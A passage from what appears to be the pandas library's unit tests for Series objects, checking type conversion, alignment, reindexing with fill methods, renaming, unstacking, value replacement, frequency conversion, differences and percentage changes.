test_convert_objects(self):\n\n s = Series([1., 2, 3], index=['a', 'b', 'c'])\n result = s.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, s)\n\n # force numeric 
conversion\n r = s.copy().astype('O')\n r['a'] = '1'\n result = r.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, s)\n\n r = s.copy().astype('O')\n r['a'] = '1.'\n result = r.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, s)\n\n r = s.copy().astype('O')\n r['a'] = 'garbled'\n expected = s.copy()\n expected['a'] = np.nan\n result = r.convert_objects(convert_dates=False, convert_numeric=True)\n assert_series_equal(result, expected)\n\n # GH 4119, not converting a mixed type (e.g.floats and object)\n s = Series([1, 'na', 3, 4])\n result = s.convert_objects(convert_numeric=True)\n expected = Series([1, np.nan, 3, 4])\n assert_series_equal(result, expected)\n\n s = Series([1, '', 3, 4])\n result = s.convert_objects(convert_numeric=True)\n expected = Series([1, np.nan, 3, 4])\n assert_series_equal(result, expected)\n\n # dates\n s = Series(\n [datetime(2001, 1, 1, 0, 0), datetime(2001, 1, 2, 0, 0), datetime(2001, 1, 3, 0, 0)])\n s2 = Series([datetime(2001, 1, 1, 0, 0), datetime(2001, 1, 2, 0, 0), datetime(\n 2001, 1, 3, 0, 0), 'foo', 1.0, 1, Timestamp('20010104'), '20010105'], dtype='O')\n\n result = s.convert_objects(convert_dates=True, convert_numeric=False)\n expected = Series(\n [Timestamp('20010101'), Timestamp('20010102'), Timestamp('20010103')], dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=True)\n assert_series_equal(result, expected)\n\n expected = Series(\n [Timestamp(\n '20010101'), Timestamp('20010102'), Timestamp('20010103'),\n lib.NaT, lib.NaT, lib.NaT, Timestamp('20010104'), Timestamp('20010105')], dtype='M8[ns]')\n result = s2.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n assert_series_equal(result, expected)\n result = s2.convert_objects(\n convert_dates='coerce', convert_numeric=True)\n assert_series_equal(result, expected)\n\n # preserver all-nans (if convert_dates='coerce')\n s = Series(['foo', 'bar', 1, 1.0], dtype='O')\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n assert_series_equal(result, s)\n\n # preserver if non-object\n s = Series([1], dtype='float32')\n result = s.convert_objects(\n convert_dates='coerce', convert_numeric=False)\n assert_series_equal(result, s)\n\n #r = s.copy()\n #r[0] = np.nan\n #result = r.convert_objects(convert_dates=True,convert_numeric=False)\n #self.assertEqual(result.dtype, 'M8[ns]')\n\n # dateutil parses some single letters into today's value as a date\n for x in 'abcdefghijklmnopqrstuvwxyz':\n s = Series([x])\n result = s.convert_objects(convert_dates='coerce')\n assert_series_equal(result, s)\n s = Series([x.upper()])\n result = s.convert_objects(convert_dates='coerce')\n assert_series_equal(result, s)\n\n def test_convert_objects_preserve_bool(self):\n s = Series([1, True, 3, 5], dtype=object)\n r = s.convert_objects(convert_numeric=True)\n e = Series([1, 1, 3, 5], dtype='i8')\n tm.assert_series_equal(r, e)\n\n def test_convert_objects_preserve_all_bool(self):\n s = Series([False, True, False, False], dtype=object)\n r = s.convert_objects(convert_numeric=True)\n e = Series([False, True, False, False], dtype=bool)\n tm.assert_series_equal(r, e)\n\n def test_apply_args(self):\n s = Series(['foo,bar'])\n\n result = s.apply(str.split, args=(',',))\n self.assertEqual(result[0], ['foo', 'bar'])\n tm.assert_isinstance(result[0], list)\n\n def 
test_align(self):\n def _check_align(a, b, how='left', fill=None):\n aa, ab = a.align(b, join=how, fill_value=fill)\n\n join_index = a.index.join(b.index, how=how)\n if fill is not None:\n diff_a = aa.index.difference(join_index)\n diff_b = ab.index.difference(join_index)\n if len(diff_a) > 0:\n self.assertTrue((aa.reindex(diff_a) == fill).all())\n if len(diff_b) > 0:\n self.assertTrue((ab.reindex(diff_b) == fill).all())\n\n ea = a.reindex(join_index)\n eb = b.reindex(join_index)\n\n if fill is not None:\n ea = ea.fillna(fill)\n eb = eb.fillna(fill)\n\n assert_series_equal(aa, ea)\n assert_series_equal(ab, eb)\n\n for kind in JOIN_TYPES:\n _check_align(self.ts[2:], self.ts[:-5], how=kind)\n _check_align(self.ts[2:], self.ts[:-5], how=kind, fill=-1)\n\n # empty left\n _check_align(self.ts[:0], self.ts[:-5], how=kind)\n\n # empty right\n _check_align(self.ts[:-5], self.ts[:0], how=kind)\n\n # both empty\n _check_align(self.ts[:0], self.ts[:0], how=kind)\n\n def test_align_fill_method(self):\n def _check_align(a, b, how='left', method='pad', limit=None):\n aa, ab = a.align(b, join=how, method=method, limit=limit)\n\n join_index = a.index.join(b.index, how=how)\n ea = a.reindex(join_index)\n eb = b.reindex(join_index)\n\n ea = ea.fillna(method=method, limit=limit)\n eb = eb.fillna(method=method, limit=limit)\n\n assert_series_equal(aa, ea)\n assert_series_equal(ab, eb)\n\n for kind in JOIN_TYPES:\n for meth in ['pad', 'bfill']:\n _check_align(self.ts[2:], self.ts[:-5], how=kind, method=meth)\n _check_align(self.ts[2:], self.ts[:-5], how=kind,\n method=meth, limit=1)\n\n # empty left\n _check_align(self.ts[:0], self.ts[:-5], how=kind, method=meth)\n _check_align(self.ts[:0], self.ts[:-5], how=kind, method=meth,\n limit=1)\n\n # empty right\n _check_align(self.ts[:-5], self.ts[:0], how=kind, method=meth)\n _check_align(self.ts[:-5], self.ts[:0], how=kind, method=meth,\n limit=1)\n\n # both empty\n _check_align(self.ts[:0], self.ts[:0], how=kind, method=meth)\n _check_align(self.ts[:0], self.ts[:0], how=kind, method=meth,\n limit=1)\n\n def test_align_nocopy(self):\n b = self.ts[:5].copy()\n\n # do copy\n a = self.ts.copy()\n ra, _ = a.align(b, join='left')\n ra[:5] = 5\n self.assertFalse((a[:5] == 5).any())\n\n # do not copy\n a = self.ts.copy()\n ra, _ = a.align(b, join='left', copy=False)\n ra[:5] = 5\n self.assertTrue((a[:5] == 5).all())\n\n # do copy\n a = self.ts.copy()\n b = self.ts[:5].copy()\n _, rb = a.align(b, join='right')\n rb[:3] = 5\n self.assertFalse((b[:3] == 5).any())\n\n # do not copy\n a = self.ts.copy()\n b = self.ts[:5].copy()\n _, rb = a.align(b, join='right', copy=False)\n rb[:2] = 5\n self.assertTrue((b[:2] == 5).all())\n\n def test_align_sameindex(self):\n a, b = self.ts.align(self.ts, copy=False)\n self.assertIs(a.index, self.ts.index)\n self.assertIs(b.index, self.ts.index)\n\n # a, b = self.ts.align(self.ts, copy=True)\n # self.assertIsNot(a.index, self.ts.index)\n # self.assertIsNot(b.index, self.ts.index)\n\n def test_reindex(self):\n\n identity = self.series.reindex(self.series.index)\n\n # __array_interface__ is not defined for older numpies\n # and on some pythons\n try:\n self.assertTrue(np.may_share_memory(self.series.index, identity.index))\n except (AttributeError):\n pass\n\n self.assertTrue(identity.index.is_(self.series.index))\n self.assertTrue(identity.index.identical(self.series.index))\n\n subIndex = self.series.index[10:20]\n subSeries = self.series.reindex(subIndex)\n\n for idx, val in compat.iteritems(subSeries):\n self.assertEqual(val, 
self.series[idx])\n\n subIndex2 = self.ts.index[10:20]\n subTS = self.ts.reindex(subIndex2)\n\n for idx, val in compat.iteritems(subTS):\n self.assertEqual(val, self.ts[idx])\n stuffSeries = self.ts.reindex(subIndex)\n\n self.assertTrue(np.isnan(stuffSeries).all())\n\n # This is extremely important for the Cython code to not screw up\n nonContigIndex = self.ts.index[::2]\n subNonContig = self.ts.reindex(nonContigIndex)\n for idx, val in compat.iteritems(subNonContig):\n self.assertEqual(val, self.ts[idx])\n\n # return a copy the same index here\n result = self.ts.reindex()\n self.assertFalse((result is self.ts))\n\n def test_reindex_corner(self):\n # (don't forget to fix this) I think it's fixed\n reindexed_dep = self.empty.reindex(self.ts.index, method='pad')\n\n # corner case: pad empty series\n reindexed = self.empty.reindex(self.ts.index, method='pad')\n\n # pass non-Index\n reindexed = self.ts.reindex(list(self.ts.index))\n assert_series_equal(self.ts, reindexed)\n\n # bad fill method\n ts = self.ts[::2]\n self.assertRaises(Exception, ts.reindex, self.ts.index, method='foo')\n\n def test_reindex_pad(self):\n\n s = Series(np.arange(10),dtype='int64')\n s2 = s[::2]\n\n reindexed = s2.reindex(s.index, method='pad')\n reindexed2 = s2.reindex(s.index, method='ffill')\n assert_series_equal(reindexed, reindexed2)\n\n expected = Series([0, 0, 2, 2, 4, 4, 6, 6, 8, 8], index=np.arange(10))\n assert_series_equal(reindexed, expected)\n\n # GH4604\n s = Series([1,2,3,4,5], index=['a', 'b', 'c', 'd', 'e'])\n new_index = ['a','g','c','f']\n expected = Series([1,1,3,3],index=new_index)\n\n # this changes dtype because the ffill happens after\n result = s.reindex(new_index).ffill()\n assert_series_equal(result, expected.astype('float64'))\n\n result = s.reindex(new_index).ffill(downcast='infer')\n assert_series_equal(result, expected)\n\n # invalid because we can't forward fill on this type of index\n self.assertRaises(ValueError, lambda : s.reindex(new_index, method='ffill'))\n\n # inferrence of new dtype\n s = Series([True,False,False,True],index=list('abcd'))\n new_index='agc'\n result = s.reindex(list(new_index)).ffill()\n expected = Series([True,True,False],index=list(new_index))\n assert_series_equal(result, expected)\n\n # GH4618 shifted series downcasting\n s = Series(False,index=lrange(0,5))\n result = s.shift(1).fillna(method='bfill')\n expected = Series(False,index=lrange(0,5))\n assert_series_equal(result, expected)\n\n def test_reindex_backfill(self):\n pass\n\n def test_reindex_int(self):\n ts = self.ts[::2]\n int_ts = Series(np.zeros(len(ts), dtype=int), index=ts.index)\n\n # this should work fine\n reindexed_int = int_ts.reindex(self.ts.index)\n\n # if NaNs introduced\n self.assertEqual(reindexed_int.dtype, np.float_)\n\n # NO NaNs introduced\n reindexed_int = int_ts.reindex(int_ts.index[::2])\n self.assertEqual(reindexed_int.dtype, np.int_)\n\n def test_reindex_bool(self):\n\n # A series other than float, int, string, or object\n ts = self.ts[::2]\n bool_ts = Series(np.zeros(len(ts), dtype=bool), index=ts.index)\n\n # this should work fine\n reindexed_bool = bool_ts.reindex(self.ts.index)\n\n # if NaNs introduced\n self.assertEqual(reindexed_bool.dtype, np.object_)\n\n # NO NaNs introduced\n reindexed_bool = bool_ts.reindex(bool_ts.index[::2])\n self.assertEqual(reindexed_bool.dtype, np.bool_)\n\n def test_reindex_bool_pad(self):\n # fail\n ts = self.ts[5:]\n bool_ts = Series(np.zeros(len(ts), dtype=bool), index=ts.index)\n filled_bool = bool_ts.reindex(self.ts.index, method='pad')\n 
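# the first five dates precede bool_ts's index, so pad/ffill has nothing to carry forward and leaves NaN\n        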
self.assertTrue(isnull(filled_bool[:5]).all())\n\n def test_reindex_like(self):\n other = self.ts[::2]\n assert_series_equal(self.ts.reindex(other.index),\n self.ts.reindex_like(other))\n\n # GH 7179\n day1 = datetime(2013,3,5)\n day2 = datetime(2013,5,5)\n day3 = datetime(2014,3,5)\n\n series1 = Series([5, None, None],[day1, day2, day3])\n series2 = Series([None, None], [day1, day3])\n\n result = series1.reindex_like(series2, method='pad')\n expected = Series([5, np.nan], index=[day1, day3])\n assert_series_equal(result, expected)\n\n def test_reindex_fill_value(self):\n #------------------------------------------------------------\n # floats\n floats = Series([1., 2., 3.])\n result = floats.reindex([1, 2, 3])\n expected = Series([2., 3., np.nan], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n result = floats.reindex([1, 2, 3], fill_value=0)\n expected = Series([2., 3., 0], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n #------------------------------------------------------------\n # ints\n ints = Series([1, 2, 3])\n\n result = ints.reindex([1, 2, 3])\n expected = Series([2., 3., np.nan], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n # don't upcast\n result = ints.reindex([1, 2, 3], fill_value=0)\n expected = Series([2, 3, 0], index=[1, 2, 3])\n self.assertTrue(issubclass(result.dtype.type, np.integer))\n assert_series_equal(result, expected)\n\n #------------------------------------------------------------\n # objects\n objects = Series([1, 2, 3], dtype=object)\n\n result = objects.reindex([1, 2, 3])\n expected = Series([2, 3, np.nan], index=[1, 2, 3], dtype=object)\n assert_series_equal(result, expected)\n\n result = objects.reindex([1, 2, 3], fill_value='foo')\n expected = Series([2, 3, 'foo'], index=[1, 2, 3], dtype=object)\n assert_series_equal(result, expected)\n\n #------------------------------------------------------------\n # bools\n bools = Series([True, False, True])\n\n result = bools.reindex([1, 2, 3])\n expected = Series([False, True, np.nan], index=[1, 2, 3], dtype=object)\n assert_series_equal(result, expected)\n\n result = bools.reindex([1, 2, 3], fill_value=False)\n expected = Series([False, True, False], index=[1, 2, 3])\n assert_series_equal(result, expected)\n\n def test_rename(self):\n renamer = lambda x: x.strftime('%Y%m%d')\n renamed = self.ts.rename(renamer)\n self.assertEqual(renamed.index[0], renamer(self.ts.index[0]))\n\n # dict\n rename_dict = dict(zip(self.ts.index, renamed.index))\n renamed2 = self.ts.rename(rename_dict)\n assert_series_equal(renamed, renamed2)\n\n # partial dict\n s = Series(np.arange(4), index=['a', 'b', 'c', 'd'], dtype='int64')\n renamed = s.rename({'b': 'foo', 'd': 'bar'})\n self.assert_numpy_array_equal(renamed.index, ['a', 'foo', 'c', 'bar'])\n\n # index with name\n renamer = Series(\n np.arange(4), index=Index(['a', 'b', 'c', 'd'], name='name'), dtype='int64')\n renamed = renamer.rename({})\n self.assertEqual(renamed.index.name, renamer.index.name)\n\n def test_rename_inplace(self):\n renamer = lambda x: x.strftime('%Y%m%d')\n expected = renamer(self.ts.index[0])\n\n self.ts.rename(renamer, inplace=True)\n self.assertEqual(self.ts.index[0], expected)\n\n def test_preserveRefs(self):\n seq = self.ts[[5, 10, 15]]\n seq[1] = np.NaN\n self.assertFalse(np.isnan(self.ts[10]))\n\n def test_ne(self):\n ts = Series([3, 4, 5, 6, 7], [3, 4, 5, 6, 7], dtype=float)\n expected = [True, True, False, True, True]\n self.assertTrue(tm.equalContents(ts.index != 5, expected))\n 
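# negating the == mask should yield the same result as the != comparison above\n        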
self.assertTrue(tm.equalContents(~(ts.index == 5), expected))\n\n def test_pad_nan(self):\n x = Series([np.nan, 1., np.nan, 3., np.nan],\n ['z', 'a', 'b', 'c', 'd'], dtype=float)\n\n x.fillna(method='pad', inplace=True)\n\n expected = Series([np.nan, 1.0, 1.0, 3.0, 3.0],\n ['z', 'a', 'b', 'c', 'd'], dtype=float)\n assert_series_equal(x[1:], expected[1:])\n self.assertTrue(np.isnan(x[0]), np.isnan(expected[0]))\n\n def test_unstack(self):\n from numpy import nan\n from pandas.util.testing import assert_frame_equal\n\n index = MultiIndex(levels=[['bar', 'foo'], ['one', 'three', 'two']],\n labels=[[1, 1, 0, 0], [0, 1, 0, 2]])\n\n s = Series(np.arange(4.), index=index)\n unstacked = s.unstack()\n\n expected = DataFrame([[2., nan, 3.], [0., 1., nan]],\n index=['bar', 'foo'],\n columns=['one', 'three', 'two'])\n\n assert_frame_equal(unstacked, expected)\n\n unstacked = s.unstack(level=0)\n assert_frame_equal(unstacked, expected.T)\n\n index = MultiIndex(levels=[['bar'], ['one', 'two', 'three'], [0, 1]],\n labels=[[0, 0, 0, 0, 0, 0],\n [0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n s = Series(np.random.randn(6), index=index)\n exp_index = MultiIndex(levels=[['one', 'two', 'three'], [0, 1]],\n labels=[[0, 1, 2, 0, 1, 2],\n [0, 1, 0, 1, 0, 1]])\n expected = DataFrame({'bar': s.values}, index=exp_index).sortlevel(0)\n unstacked = s.unstack(0)\n assert_frame_equal(unstacked, expected)\n\n # GH5873\n idx = pd.MultiIndex.from_arrays([[101, 102], [3.5, np.nan]])\n ts = pd.Series([1,2], index=idx)\n left = ts.unstack()\n right = DataFrame([[nan, 1], [2, nan]], index=[101, 102],\n columns=[nan, 3.5])\n assert_frame_equal(left, right)\n\n idx = pd.MultiIndex.from_arrays([['cat', 'cat', 'cat', 'dog', 'dog'],\n ['a', 'a', 'b', 'a', 'b'], [1, 2, 1, 1, np.nan]])\n ts = pd.Series([1.0, 1.1, 1.2, 1.3, 1.4], index=idx)\n right = DataFrame([[1.0, 1.3], [1.1, nan], [nan, 1.4], [1.2, nan]],\n columns=['cat', 'dog'])\n tpls = [('a', 1), ('a', 2), ('b', nan), ('b', 1)]\n right.index = pd.MultiIndex.from_tuples(tpls)\n assert_frame_equal(ts.unstack(level=0), right)\n\n def test_sortlevel(self):\n mi = MultiIndex.from_tuples([[1, 1, 3], [1, 1, 1]], names=list('ABC'))\n s = Series([1, 2], mi)\n backwards = s.iloc[[1, 0]]\n\n res = s.sortlevel('A')\n assert_series_equal(backwards, res)\n\n res = s.sortlevel(['A', 'B'])\n assert_series_equal(backwards, res)\n\n res = s.sortlevel('A', sort_remaining=False)\n assert_series_equal(s, res)\n\n res = s.sortlevel(['A', 'B'], sort_remaining=False)\n assert_series_equal(s, res)\n\n def test_head_tail(self):\n assert_series_equal(self.series.head(), self.series[:5])\n assert_series_equal(self.series.tail(), self.series[-5:])\n\n def test_isin(self):\n s = Series(['A', 'B', 'C', 'a', 'B', 'B', 'A', 'C'])\n\n result = s.isin(['A', 'C'])\n expected = Series([True, False, True, False, False, False, True, True])\n assert_series_equal(result, expected)\n\n def test_isin_with_string_scalar(self):\n # GH4763\n s = Series(['A', 'B', 'C', 'a', 'B', 'B', 'A', 'C'])\n with tm.assertRaises(TypeError):\n s.isin('a')\n\n with tm.assertRaises(TypeError):\n s = Series(['aaa', 'b', 'c'])\n s.isin('aaa')\n\n def test_isin_with_i8(self):\n # GH 5021\n\n expected = Series([True,True,False,False,False])\n expected2 = Series([False,True,False,False,False])\n\n # datetime64[ns]\n s = Series(date_range('jan-01-2013','jan-05-2013'))\n\n result = s.isin(s[0:2])\n assert_series_equal(result, expected)\n\n result = s.isin(s[0:2].values)\n assert_series_equal(result, expected)\n\n # fails on dtype conversion in 
the first place\n result = s.isin(s[0:2].values.astype('datetime64[D]'))\n assert_series_equal(result, expected)\n\n result = s.isin([s[1]])\n assert_series_equal(result, expected2)\n\n result = s.isin([np.datetime64(s[1])])\n assert_series_equal(result, expected2)\n\n # timedelta64[ns]\n s = Series(pd.to_timedelta(lrange(5),unit='d'))\n result = s.isin(s[0:2])\n assert_series_equal(result, expected)\n\n#------------------------------------------------------------------------------\n# TimeSeries-specific\n def test_cummethods_bool(self):\n # GH 6270\n # looks like a buggy np.maximum.accumulate for numpy 1.6.1, py 3.2\n def cummin(x):\n return np.minimum.accumulate(x)\n\n def cummax(x):\n return np.maximum.accumulate(x)\n\n a = pd.Series([False, False, False, True, True, False, False])\n b = ~a\n c = pd.Series([False] * len(b))\n d = ~c\n methods = {'cumsum': np.cumsum, 'cumprod': np.cumprod,\n 'cummin': cummin, 'cummax': cummax}\n args = product((a, b, c, d), methods)\n for s, method in args:\n expected = Series(methods[method](s.values))\n result = getattr(s, method)()\n assert_series_equal(result, expected)\n\n e = pd.Series([False, True, nan, False])\n cse = pd.Series([0, 1, nan, 1], dtype=object)\n cpe = pd.Series([False, 0, nan, 0])\n cmin = pd.Series([False, False, nan, False])\n cmax = pd.Series([False, True, nan, True])\n expecteds = {'cumsum': cse, 'cumprod': cpe, 'cummin': cmin,\n 'cummax': cmax}\n\n for method in methods:\n res = getattr(e, method)()\n assert_series_equal(res, expecteds[method])\n\n def test_replace(self):\n N = 100\n ser = Series(np.random.randn(N))\n ser[0:4] = np.nan\n ser[6:10] = 0\n\n # replace list with a single value\n ser.replace([np.nan], -1, inplace=True)\n\n exp = ser.fillna(-1)\n assert_series_equal(ser, exp)\n\n rs = ser.replace(0., np.nan)\n ser[ser == 0.] 
= np.nan\n assert_series_equal(rs, ser)\n\n ser = Series(np.fabs(np.random.randn(N)), tm.makeDateIndex(N),\n dtype=object)\n ser[:5] = np.nan\n ser[6:10] = 'foo'\n ser[20:30] = 'bar'\n\n # replace list with a single value\n rs = ser.replace([np.nan, 'foo', 'bar'], -1)\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -1).all())\n self.assertTrue((rs[20:30] == -1).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values\n rs = ser.replace({np.nan: -1, 'foo': -2, 'bar': -3})\n\n self.assertTrue((rs[:5] == -1).all())\n self.assertTrue((rs[6:10] == -2).all())\n self.assertTrue((rs[20:30] == -3).all())\n self.assertTrue((isnull(ser[:5])).all())\n\n # replace with different values with 2 lists\n rs2 = ser.replace([np.nan, 'foo', 'bar'], [-1, -2, -3])\n assert_series_equal(rs, rs2)\n\n # replace inplace\n ser.replace([np.nan, 'foo', 'bar'], -1, inplace=True)\n\n self.assertTrue((ser[:5] == -1).all())\n self.assertTrue((ser[6:10] == -1).all())\n self.assertTrue((ser[20:30] == -1).all())\n\n ser = Series([np.nan, 0, np.inf])\n assert_series_equal(ser.replace(np.nan, 0), ser.fillna(0))\n\n ser = Series([np.nan, 0, 'foo', 'bar', np.inf, None, lib.NaT])\n assert_series_equal(ser.replace(np.nan, 0), ser.fillna(0))\n filled = ser.copy()\n filled[4] = 0\n assert_series_equal(ser.replace(np.inf, 0), filled)\n\n ser = Series(self.ts.index)\n assert_series_equal(ser.replace(np.nan, 0), ser.fillna(0))\n\n # malformed\n self.assertRaises(ValueError, ser.replace, [1, 2, 3], [np.nan, 0])\n\n # make sure that we aren't just masking a TypeError because bools don't\n # implement indexing\n with tm.assertRaisesRegexp(TypeError, 'Cannot compare types .+'):\n ser.replace([1, 2], [np.nan, 0])\n\n ser = Series([0, 1, 2, 3, 4])\n result = ser.replace([0, 1, 2, 3, 4], [4, 3, 2, 1, 0])\n assert_series_equal(result, Series([4, 3, 2, 1, 0]))\n\n # API change from 0.12?\n # GH 5319\n ser = Series([0, np.nan, 2, 3, 4])\n expected = ser.ffill()\n result = ser.replace([np.nan])\n assert_series_equal(result, expected)\n\n ser = Series([0, np.nan, 2, 3, 4])\n expected = ser.ffill()\n result = ser.replace(np.nan)\n assert_series_equal(result, expected)\n #GH 5797\n ser = Series(date_range('20130101', periods=5))\n expected = ser.copy()\n expected.loc[2] = Timestamp('20120101')\n result = ser.replace({Timestamp('20130103'):\n Timestamp('20120101')})\n assert_series_equal(result, expected)\n result = ser.replace(Timestamp('20130103'), Timestamp('20120101'))\n assert_series_equal(result, expected)\n\n def test_replace_with_single_list(self):\n ser = Series([0, 1, 2, 3, 4])\n result = ser.replace([1,2,3])\n assert_series_equal(result, Series([0,0,0,0,4]))\n\n s = ser.copy()\n s.replace([1,2,3],inplace=True)\n assert_series_equal(s, Series([0,0,0,0,4]))\n\n # make sure things don't get corrupted when fillna call fails\n s = ser.copy()\n with tm.assertRaises(ValueError):\n s.replace([1,2,3],inplace=True,method='crash_cymbal')\n assert_series_equal(s, ser)\n\n def test_replace_mixed_types(self):\n s = Series(np.arange(5),dtype='int64')\n\n def check_replace(to_rep, val, expected):\n sc = s.copy()\n r = s.replace(to_rep, val)\n sc.replace(to_rep, val, inplace=True)\n assert_series_equal(expected, r)\n assert_series_equal(expected, sc)\n\n # should NOT upcast to float\n e = Series([0,1,2,3,4])\n tr, v = [3], [3.0]\n check_replace(tr, v, e)\n\n # MUST upcast to float\n e = Series([0,1,2,3.5,4])\n tr, v = [3], [3.5]\n check_replace(tr, v, e)\n\n # casts to object\n e = 
Series([0,1,2,3.5,'a'])\n tr, v = [3,4], [3.5,'a']\n check_replace(tr, v, e)\n\n # again casts to object\n e = Series([0,1,2,3.5,Timestamp('20130101')])\n tr, v = [3,4],[3.5,Timestamp('20130101')]\n check_replace(tr, v, e)\n\n # casts to float\n e = Series([0,1,2,3.5,1])\n tr, v = [3,4],[3.5,True]\n check_replace(tr, v, e)\n\n # test an object with dates + floats + integers + strings\n dr = date_range('1/1/2001', '1/10/2001',\n freq='D').to_series().reset_index(drop=True)\n r = dr.astype(object).replace([dr[0],dr[1],dr[2]], [1.0,2,'a'])\n assert_series_equal(r, Series([1.0,2,'a'] +\n dr[3:].tolist(),dtype=object))\n\n def test_replace_bool_with_string_no_op(self):\n s = Series([True, False, True])\n result = s.replace('fun', 'in-the-sun')\n tm.assert_series_equal(s, result)\n\n def test_replace_bool_with_string(self):\n # nonexistent elements\n s = Series([True, False, True])\n result = s.replace(True, '2u')\n expected = Series(['2u', False, '2u'])\n tm.assert_series_equal(expected, result)\n\n def test_replace_bool_with_bool(self):\n s = Series([True, False, True])\n result = s.replace(True, False)\n expected = Series([False] * len(s))\n tm.assert_series_equal(expected, result)\n\n def test_replace_with_dict_with_bool_keys(self):\n s = Series([True, False, True])\n with tm.assertRaisesRegexp(TypeError, 'Cannot compare types .+'):\n s.replace({'asdf': 'asdb', True: 'yes'})\n\n def test_asfreq(self):\n ts = Series([0., 1., 2.], index=[datetime(2009, 10, 30),\n datetime(2009, 11, 30),\n datetime(2009, 12, 31)])\n\n daily_ts = ts.asfreq('B')\n monthly_ts = daily_ts.asfreq('BM')\n self.assert_numpy_array_equal(monthly_ts, ts)\n\n daily_ts = ts.asfreq('B', method='pad')\n monthly_ts = daily_ts.asfreq('BM')\n self.assert_numpy_array_equal(monthly_ts, ts)\n\n daily_ts = ts.asfreq(datetools.bday)\n monthly_ts = daily_ts.asfreq(datetools.bmonthEnd)\n self.assert_numpy_array_equal(monthly_ts, ts)\n\n result = ts[:0].asfreq('M')\n self.assertEqual(len(result), 0)\n self.assertIsNot(result, ts)\n\n def test_diff(self):\n # Just run the function\n self.ts.diff()\n\n # int dtype\n a = 10000000000000000\n b = a + 1\n s = Series([a, b])\n\n rs = s.diff()\n self.assertEqual(rs[1], 1)\n\n # neg n\n rs = self.ts.diff(-1)\n xp = self.ts - self.ts.shift(-1)\n assert_series_equal(rs, xp)\n\n # 0\n rs = self.ts.diff(0)\n xp = self.ts - self.ts\n assert_series_equal(rs, xp)\n\n # datetime diff (GH3100)\n s = Series(date_range('20130102', periods=5))\n rs = s - s.shift(1)\n xp = s.diff()\n assert_series_equal(rs, xp)\n\n # timedelta diff\n nrs = rs - rs.shift(1)\n nxp = xp.diff()\n assert_series_equal(nrs, nxp)\n\n def test_pct_change(self):\n rs = self.ts.pct_change(fill_method=None)\n assert_series_equal(rs, self.ts / self.ts.shift(1) - 1)\n\n rs = self.ts.pct_change(2)\n filled = self.ts.fillna(method='pad')\n assert_series_equal(rs, filled / filled.shift(2) - 1)\n\n rs = self.ts.pct_change(fill_method='bfill', limit=1)\n filled = self.ts.fillna(method='bfill', limit=1)\n assert_series_equal(rs, filled / filled.shift(1) - 1)\n\n rs = self.ts.pct_change(freq='5D')\n filled = self.ts.fillna(method='pad')\n assert_series_equal(rs, filled / filled.shift(freq='5D') - 1)\n\n def test_pct_change_shift_over_nas(self):\n s = Series([1., 1.5, np.nan, 2.5, 3.])\n\n chg = s.pct_change()\n expected = Series([np.nan, 0.5, np.nan, 2.5 / 1.5 - 1, .2])\n assert_series_equal(chg, expected)\n\n def test_autocorr(self):\n # Just run the function\n corr1 = self.ts.autocorr()\n\n # Now run it with the lag parameter\n corr2 = 
self.ts.autocorr(lag=1)\n\n # corr() with lag needs Series of at least length 2\n if len(self.ts) <= 2:\n self.assertTrue(np.isnan(corr1))\n self.assertTrue(np.isnan(corr2))\n else:\n self.assertEqual(corr1, corr2)\n\n # Choose a random lag between 1 and length of Series - 2\n # and compare the result with the Series corr() function\n n = 1 + np.random.randint(max(1, len(self.ts) - 2))\n corr1 = self.ts.corr(self.ts.shift(n))\n corr2 = self.ts.autocorr(lag=n)\n\n # corr() with lag needs Series of at least length 2\n if len(self.ts) <= 2:\n self.assertTrue(np.isnan(corr1))\n self.assertTrue(np.isnan(corr2))\n else:\n self.assertEqual(corr1, corr2)\n\n def test_first_last_valid(self):\n ts = self.ts.copy()\n ts[:5] = np.NaN\n\n index = ts.first_valid_index()\n self.assertEqual(index, ts.index[5])\n\n ts[-5:] = np.NaN\n index = ts.last_valid_index()\n self.assertEqual(index, ts.index[-6])\n\n ts[:] = np.nan\n self.assertIsNone(ts.last_valid_index())\n self.assertIsNone(ts.first_valid_index())\n\n ser = Series([], index=[])\n self.assertIsNone(ser.last_valid_index())\n self.assertIsNone(ser.first_valid_index())\n\n def test_mpl_compat_hack(self):\n result = self.ts[:, np.newaxis]\n expected = self.ts.values[:, np.newaxis]\n assert_almost_equal(result, expected)\n\n#------------------------------------------------------------------------------\n# GroupBy\n\n def test_select(self):\n n = len(self.ts)\n result = self.ts.select(lambda x: x >= self.ts.index[n // 2])\n expected = self.ts.reindex(self.ts.index[n // 2:])\n assert_series_equal(result, expected)\n\n result = self.ts.select(lambda x: x.weekday() == 2)\n expected = self.ts[self.ts.index.weekday == 2]\n assert_series_equal(result, expected)\n\n#------------------------------------------------------------------------------\n# Misc not safe for sparse\n\n def test_dropna_preserve_name(self):\n self.ts[:5] = np.nan\n result = self.ts.dropna()\n self.assertEqual(result.name, self.ts.name)\n name = self.ts.name\n ts = self.ts.copy()\n ts.dropna(inplace=True)\n self.assertEqual(ts.name, name)\n\n def test_numpy_unique(self):\n # it works!\n result = np.unique(self.ts)\n\n def test_concat_empty_series_dtypes_roundtrips(self):\n\n # round-tripping with self & like self\n dtypes = map(np.dtype,['float64','int8','uint8','bool','m8[ns]','M8[ns]'])\n\n for dtype in dtypes:\n self.assertEqual(pd.concat([Series(dtype=dtype)]).dtype, dtype)\n self.assertEqual(pd.concat([Series(dtype=dtype),\n Series(dtype=dtype)]).dtype, dtype)\n\n def int_result_type(dtype, dtype2):\n typs = set([dtype.kind,dtype2.kind])\n if not len(typs-set(['i','u','b'])) and (dtype.kind == 'i' or dtype2.kind == 'i'):\n return 'i'\n elif not len(typs-set(['u','b'])) and (dtype.kind == 'u' or dtype2.kind == 'u'):\n return 'u'\n return None\n\n def float_result_type(dtype, dtype2):\n typs = 